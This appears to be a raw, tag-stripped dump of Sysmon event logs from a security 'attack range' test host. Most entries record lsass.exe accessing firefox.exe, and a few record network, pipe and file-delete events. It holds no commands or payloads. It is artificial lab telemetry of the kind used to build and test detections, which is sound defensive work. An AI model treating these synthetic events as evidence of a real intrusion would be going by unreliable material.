Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287987Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287986Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287985Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287979Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287978Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287977Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.598{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000287967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:23.880{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcpfalsefalse127.0.0.1-53450-false127.0.0.1-53449- 354300x8000000000000000287966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:23.880{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse127.0.0.1-53450-false127.0.0.1-53449- 17141700x8000000000000000287965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:25.583{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.3.186295593C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000287964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.563{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3064975214F8C7203735209516EDFB25,SHA256=B88290C84AE19D2563459099AB90B946DF5978C2F2829724CB4C63B1F5D508FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.532{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:25.532{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 18141800x8000000000000000287961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 